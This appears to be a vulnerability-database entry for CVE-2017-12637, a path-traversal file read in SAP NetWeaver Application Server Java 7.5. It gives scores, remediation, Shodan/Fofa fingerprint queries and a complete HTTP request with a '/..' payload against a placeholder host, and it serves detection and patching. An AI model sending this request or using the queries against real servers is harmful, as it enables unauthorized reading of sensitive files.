🔙 목록으로 돌아가기

CVE-2017-12637: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion

TitleSAP NetWeaver Application Server Java 7.5 - Local File Inclusion
Authorapt-mirror
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.
RemediationApply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
CVSS Score7.5
EPSS Score0.93219
CVE IDCVE-2017-12637
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:-266008933
Fofa Queryicon_hash=-266008933
Tags cve2017 cve sap lfi java traversal kev vkev vuln

🔍 Vulnerability Description

SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.

🌐 HTTP Request

GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-12637.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-12637.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A